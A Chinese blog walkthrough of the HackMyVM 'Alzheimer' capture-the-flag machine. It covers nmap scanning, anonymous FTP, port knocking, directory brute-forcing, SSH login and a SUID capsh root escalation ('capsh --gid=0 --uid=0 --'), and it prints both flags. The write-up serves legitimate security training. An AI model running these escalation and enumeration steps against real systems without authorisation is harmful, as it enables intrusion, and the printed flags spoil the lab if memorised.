• HackMyVM-Alzheimer

    目录

    信息收集

    arp

    nmap

    FTP服务信息收集

    匿名登陆

    关键信息

    knock

    WEB信息收集

    信息收集

    gobuster

    目录爆破

    ssh登录

    提权

    系统信息收集

    提权

    get root

    信息收集

    arp
    1. ┌──(root㉿0x00)-[~/HackMyVM]
    2. └─# arp-scan -l
    3. Interface: eth0, type: EN10MB, MAC: 08:00:27:77:ed:84, IPv4: 192.168.9.126
    4. Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
    5.  
    6. 192.168.9.140   08:00:27:b5:74:cd       PCS Systemtechnik GmbH
    7.  
    8. 6 packets received by filter, 0 packets dropped by kernel
    9. Ending arp-scan 1.10.0: 256 hosts scanned in 1.941 seconds (131.89 hosts/sec). 6 responded
    10.
    nmap
    1. 端口信息扫描
    2.  
    3. ┌──(root㉿0x00)-[~/HackMyVM]
    4. └─# nmap -p- 192.168.9.140 --min-rate 10000                
    5. Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-24 08:24 CST
    6. Nmap scan report for 192.168.9.140
    7. Host is up (0.22s latency).
    8. Not shown: 65532 closed tcp ports (reset)
    9. PORT   STATE    SERVICE
    10. 21/tcp open     ftp
    11. 22/tcp filtered ssh
    12. 80/tcp filtered http
    13. MAC Address: 08:00:27:B5:74:CD (Oracle VirtualBox virtual NIC)
    14.  
    15. Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds
    16.  
    一共扫描出来三个端口,2280没有开放,我们目前只能利用21端口!

    1. ┌──(root㉿0x00)-[~/HackMyVM]
    2. └─# nmap -sC -sV -O -p 21,22,80 192.168.9.140 --min-rate 10000
    3. Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-24 08:26 CST
    4. Nmap scan report for 192.168.9.140
    5. Host is up (0.00084s latency).
    6.  
    7. PORT   STATE    SERVICE VERSION
    8. 21/tcp open     ftp     vsftpd 3.0.3
    9. |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    10. | ftp-syst: 
    11. |   STAT: 
    12. | FTP server status:
    13. |      Connected to ::ffff:192.168.9.126
    14. |      Logged in as ftp
    15. |      TYPE: ASCII
    16. |      No session bandwidth limit
    17. |      Session timeout in seconds is 300
    18. |      Control connection is plain text
    19. |      Data connections will be plain text
    20. |      At session startup, client count was 1
    21. |      vsFTPd 3.0.3 - secure, fast, stable
    22. |_End of status
    23. 22/tcp filtered ssh
    24. 80/tcp filtered http
    25. MAC Address: 08:00:27:B5:74:CD (Oracle VirtualBox virtual NIC)
    26. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    27. Device type: general purpose
    28. Running: Linux 4.X|5.X
    29. OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
    30. OS details: Linux 4.15 - 5.8
    31. Network Distance: 1 hop
    32. Service Info: OS: Unix
    33.  
    34. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    35. Nmap done: 1 IP address (1 host up) scanned in 2.99 seconds
    36.

    FTP服务信息收集

    匿名登陆
    1. ┌──(root㉿0x00)-[~/HackMyVM]
    2. └─# ftp 192.168.9.140                           
    3. Connected to 192.168.9.140.
    4. 220 (vsFTPd 3.0.3)
    5. Name (192.168.9.140:root): anonymous
    6. 331 Please specify the password.
    7. Password: 
    8. 230 Login successful.
    9. Remote system type is UNIX.
    10. Using binary mode to transfer files.
    11. ftp> binary
    12. 200 Switching to Binary mode.
    13. ftp> ls -al
    14. 229 Entering Extended Passive Mode (|||60284|)
    15. 150 Here comes the directory listing.
    16. drwxr-xr-x    2 0        113          4096 Oct 03  2020 .
    17. drwxr-xr-x    2 0        113          4096 Oct 03  2020 ..
    18. -rw-r--r--    1 0        0              70 Oct 03  2020 .secretnote.txt
    19. 226 Directory send OK.
    20.  
    ftp服务是可以匿名登陆的!而且有个关键信息!我们get到本地!
    关键信息
    1. ┌──(root㉿0x00)-[~/HackMyVM]
    2. └─# ls -al
    3. total 12
    4. drwxr-xr-x  2 root root 4096 Apr 24 08:28 .
    5. drwx------ 23 root root 4096 Apr 24 08:28 ..
    6. -rw-r--r--  1 root root   70 Oct  3  2020 .secretnote.txt
    7.                                                                                                                                        
    8. ┌──(root㉿0x00)-[~/HackMyVM]
    9. └─# cat .secretnote.txt 
    10. I need to knock this ports and 
    11. one door will be open!
    12. 1000
    13. 2000
    14. 3000
    15.  
    果然,我们需要使用knock工具来进行敲门服务来唤醒2280端口!
    knock
    1. ┌──(root㉿0x00)-[~/HackMyVM]
    2. └─# knock 192.168.9.140 1000 2000 3000
    3.  
    1. 扫描端口是否开放
    2.  
    3. ┌──(root㉿0x00)-[~/HackMyVM]
    4. └─# nmap -p- 192.168.9.140 --min-rate 10000                
    5. Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-24 08:35 CST
    6. Nmap scan report for 192.168.9.140
    7. Host is up (0.52s latency).
    8. Not shown: 65532 closed tcp ports (reset)
    9. PORT   STATE    SERVICE
    10. 21/tcp open     ftp
    11. 22/tcp filtered ssh
    12. 80/tcp open     http
    13. MAC Address: 08:00:27:B5:74:CD (Oracle VirtualBox virtual NIC)
    14.  
    15. Nmap done: 1 IP address (1 host up) scanned in 10.56 seconds
    16.  
    我只看到了80端口被激活了!

    WEB信息收集

    信息收集

    1. 有很多信息
    2.  
    3. 1、可能存在目录  xxx.txt
    4. 2、用户名  medusa
    5. 3、编码字符串 ---. --- - .... .. -. --. --

    1. 不出意外,应该是othingm
    2.  
    3. 可能是密码,也可能是目录!
    gobuster
    1. ┌──(root㉿0x00)-[~/HackMyVM]
    2. └─# gobuster dir -u http://192.168.9.140/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    3. ===============================================================
    4. Gobuster v3.6
    5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    6. ===============================================================
    7. [+] Url:                     http://192.168.9.140/
    8. [+] Method:                  GET
    9. [+] Threads:                 10
    10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    11. [+] Negative Status codes:   404
    12. [+] User Agent:              gobuster/3.6
    13. [+] Timeout:                 10s
    14. ===============================================================
    15. Starting gobuster in directory enumeration mode
    16. ===============================================================
    17. /home                 (Status: 301) [Size: 185] [--> http://192.168.9.140/home/]
    18. /admin                (Status: 301) [Size: 185] [--> http://192.168.9.140/admin/]
    19. /secret               (Status: 301) [Size: 185] [--> http://192.168.9.140/secret/]
    20. Progress: 220561 / 220562 (100.00%)
    21. ===============================================================
    22. Finished
    23. ===============================================================
    24.  

    根据提示,我们只能对这两个目录进行检索了!
    目录爆破
    1. ┌──(root㉿0x00)-[~/HackMyVM]
    2. └─# dirsearch -u http://192.168.9.140/secret/
    3.  
    4.   _|. _ _  _  _  _ _|_    v0.4.3
    5.  (_||| _) (/_(_|| (_| )
    6.  
    7. Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
    8.  
    9. Output File: /root/HackMyVM/reports/http_192.168.9.140/_secret__24-04-24_11-14-15.txt
    10.  
    11. Target: http://192.168.9.140/
    12.  
    13. [11:14:15] Starting: secret/
    14. [11:14:29] 301 -  185B  - /secret/home  ->  http://192.168.9.140/secret/home/
    15.                                                                              
    16. Task Completed
    17.  

    1. 没有什么可用信息!
    2.  
    3. 经过提示,我想到了ftp,我们把那个隐藏文件重新下载!

    1. 果然,增加了新东西
    2.  
    3. Ihavebeenalwayshere!!!
    4.
    ssh登录

    登录成功!密码就是 Ihavebeenalwayshere!!!

    提权

    系统信息收集
    1. medusa@alzheimer:~$ ls -al
    2. total 32
    3. drwxr-xr-x 3 medusa medusa 4096 Oct  3  2020 .
    4. drwxr-xr-x 3 root   root   4096 Oct  2  2020 ..
    5. -rw-r--r-- 1 medusa medusa  220 Oct  2  2020 .bash_logout
    6. -rw-r--r-- 1 medusa medusa 3526 Oct  2  2020 .bashrc
    7. drwxr-xr-x 3 medusa medusa 4096 Oct  3  2020 .local
    8. -rw-r--r-- 1 medusa medusa  807 Oct  2  2020 .profile
    9. -rw-r--r-- 1 medusa medusa   19 Oct  3  2020 user.txt
    10. -rw------- 1 medusa medusa  107 Oct  3  2020 .Xauthority
    11. medusa@alzheimer:~$ cat user.txt 
    12. HMVrespectmemories
    13.  
    1. medusa@alzheimer:~$ sudo -l
    2. Matching Defaults entries for medusa on alzheimer:
    3.     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
    4.  
    5. User medusa may run the following commands on alzheimer:
    6.     (ALL) NOPASSWD: /bin/id
    7.  
    1. medusa@alzheimer:/tmp$ find / -perm -u=s -type f 2>/dev/null
    2. /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    3. /usr/lib/openssh/ssh-keysign
    4. /usr/lib/eject/dmcrypt-get-device
    5. /usr/bin/chsh
    6. /usr/bin/sudo
    7. /usr/bin/mount
    8. /usr/bin/newgrp
    9. /usr/bin/su
    10. /usr/bin/passwd
    11. /usr/bin/chfn
    12. /usr/bin/umount
    13. /usr/bin/gpasswd
    14. /usr/sbin/capsh
    15.
    提权
    1. /usr/sbin/capsh
    2.  
    3. 具有suid权限,可进行提权操作!

    1. medusa@alzheimer:~$ whereis capsh 
    2. capsh: /usr/sbin/capsh /usr/share/man/man1/capsh.1.gz
    3.  
    1. payload
    2.  
    3. medusa@alzheimer:~$ /usr/sbin/capsh --gid=0 --uid=0 --
    4. root@alzheimer:~# 
    5.  
    一定要先确定capsh的工作目录!
    get root
    1. root@alzheimer:~# cd /root
    2. root@alzheimer:/root# ls
    3. root.txt
    4. root@alzheimer:/root# cat root.txt
    5. HMVlovememories
    6.

  • 相关阅读:
    【大数据存储技术】第7章 MongoDB 的原理和使用
    Activiti7报错:org.springframework.security.core.userdetails.UserDetailsService
    第11期 | GPTSecurity周报
    Python脚本2 打印文本内两个日期之间的所有小时
    Jetpack:016-Jetpack中的SanckBar
    Ts常见报错解决方案
    svn和TortoiseSVN下载安装步骤【非常详细】
    沁恒 CH32V208(五): CH32V208 运行FreeRTOS示例的说明
    spdlog日式库
    欧拉操作系统在线安装mysql8数据库
  • 原文地址:https://blog.csdn.net/rx3225968517/article/details/138156025